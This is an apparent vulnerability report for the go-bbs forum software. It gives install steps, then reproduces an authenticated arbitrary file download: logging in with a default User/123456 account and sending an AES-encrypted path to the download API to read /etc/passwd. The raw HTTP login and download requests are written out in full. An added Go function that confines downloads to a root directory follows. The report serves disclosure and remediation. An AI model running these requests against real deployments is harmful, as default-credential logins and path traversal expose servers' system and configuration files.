Install
git clone https://github.com/gobbscom/go-bbs.git
cd go-bbs && mkdir conf
Copy the configuration file: cp app.conf.example conf/app.conf
Modify the database configuration
Execute ./go-bbs --install to install the database
Finally, execute ./go-bbs to access the corresponding port
Vulnerability Description AND recurrence
View routing API routers/router.go line 196
Follow up the &home.SingleController{} Download method. This interface requires a logged-in user, and a global search for Customer shows that a user is added by default:
UserName: User
PassWord: 123456
Check router.go, follow up &home.LoginController{}, and pass the username and password to log in:
POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=user&password=123456
Credentials obtained: beegosessionID=***
The incoming URL is passed through AesDecrypt, so you need to perform AesEncrypt on the path to be downloaded:
GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close
Use the credentials to access the download API and successfully download /etc/passwd
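One way to close the issue described above, as an added example that is not part of the original report or the go-bbs code: after AesDecrypt, the handler confines the decrypted path to a fixed download directory before opening any file. The function name ResolveDownload, the root directory and the sample paths are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned for any request that does not name a file under the root.
var ErrOutsideRoot = errors.New("requested path is outside the download root")

// ResolveDownload maps the already-decrypted path onto a file under root.
// Both the function and root are hypothetical names, not go-bbs code.
// Symlinks below root are not resolved here.
func ResolveDownload(root, requested string) (string, error) {
	if requested == "" || strings.ContainsRune(requested, 0) || filepath.IsAbs(requested) {
		return "", ErrOutsideRoot // empty, NUL byte, or absolute like /etc/passwd
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Join cleans the path, collapsing any "a/../.." sequences before the check.
	candidate := filepath.Join(absRoot, requested)
	rel, err := filepath.Rel(absRoot, candidate)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return candidate, nil
}

func main() {
	root := "/srv/go-bbs/uploads" // constructed sample root
	// Constructed sample inputs, as they would look after decryption.
	for _, p := range []string{"2022/05/report.zip", "/etc/passwd", "../../etc/passwd", "a/../../conf/app.conf"} {
		full, err := ResolveDownload(root, p)
		fmt.Printf("%-24q -> %q err=%v\n", p, full, err)
	}
}
```

Encrypting the path parameter does not replace this check, because any logged-in client that can produce a valid ciphertext controls the plaintext path.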